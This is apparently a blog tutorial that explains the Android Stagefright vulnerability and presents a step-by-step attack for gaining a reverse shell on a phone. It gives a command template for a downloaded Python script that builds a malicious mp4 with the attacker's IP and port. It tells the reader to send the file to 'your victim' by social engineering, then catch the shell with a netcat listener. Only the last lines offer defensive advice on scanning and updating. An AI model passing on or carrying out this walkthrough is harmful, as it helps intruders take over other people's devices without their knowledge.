Today i am going to demonstrate a exploit to take reverse shell in android,before i explain the demo i want to explain some things related to this hack or exploit and also this for education and awareness about security of your devices.
What is Stagefright?
Android includes Stagefright, a media playback engine at the native level that has built-in software-based codecs for popular media formats.
Stagefright audio and video playback features include integration with OpenMAX codecs, session management, time-synchronized rendering, transport control, and DRM.
Stagefright also supports integration with custom hardware codecs provided by you. To set a hardware path to encode
and decode media, you must implement a hardware-based codec as an OpenMax IL (Integration Layer) component.
How hacker can exploit this Stagefright Library?
This critical vulnerability was discovered by a researcher at Cyber Security Firm called Zimperium. This vulnerability is a type of buffer overflow attack and in this attack hacker don’t need any kind of user interaction.In this vulnerability hacker sends a mp4 video that crash Stagefright library and restart the process with reverse shell.
1.Boot up your kali linux.
2.Download the python script from this link and rename file as mp4.py
3.Run this command as explained in this pic for example:-
“python ‘address of script’ -c your local ip -p any open port -o file name of video”.
4.Then send this file to your victim by using your social engineering skills.
5.After victim trapped in attack then site listing port by using this command “netcat -l -p port which used while creating your attack video”.
This attack work only on android 2.1-5.0.
If you want to check that are you vulnerable to this attack then scan your device by downloading app from play store.
If you are vulnerable then update your device to latest version.
I hope you understand this article well.
Don’t forget to like our Facebook Page and Subscribe to our Youtube Channel.